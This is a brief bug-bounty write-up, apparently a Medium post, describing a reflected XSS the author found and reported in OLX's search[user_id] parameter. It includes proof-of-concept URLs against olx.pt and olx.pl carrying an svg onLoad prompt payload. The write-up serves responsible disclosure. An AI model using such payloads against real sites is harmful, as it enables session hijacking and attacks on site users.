A real XSS in OLX Bug Bounty

Paulo Choupina
Mar 21, 2019 · 2 min read

I saw a couple of other write-ups and blog posts about “XSS in OLX” but when I got to read them, they end up being either stored XSS or in some other website that belongs within the scope of OLX…

SO!!

I figured, “hey if they are good enough for a write-up, so it’s my bug.” xD

Original report: https://hackerone.com/reports/477771

I was looking for bugs on another website when I came across this.
It is a reflected Cross Site Scripting (XSS) vulnerability in the parameter search[user_id] located at the main page of Olx.pt

If you navigate to Olx.pt
and choose a random item, open that item page and click
“outros anúncios” as in “other ads”
you will get redirected to:

https://www.olx.pt/ads/?search%5Buser_id%5D=xxx&view=galleryWide

Within that page, the parameter search[user_id] was vulnerable to XSS.

POC:

https://www.olx.pt/braga/?search%5Buser_id%5D=1zqjeu'%22()%7B%7D<x>:/1zqjeu;9</SCript><svG/onLoad=prompt(9)>, ;prompt(9);&view=galleryWide

It was across all the domains, here is an example of it in Poland’s domain:

https://www.olx.pl/lubelskie/?search%5Buser_id%5D=1zqjeu'%22()%7B%7D<x>:/1zqjeu;9</SCript><svG/onLoad=prompt(9)>, ;prompt(9);&view=galleryWide

I reported it and got added to the OLX’s Hall of Fame:
https://security.olx.com/security-hall-of-fame.html

Kudos to me!! xD

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store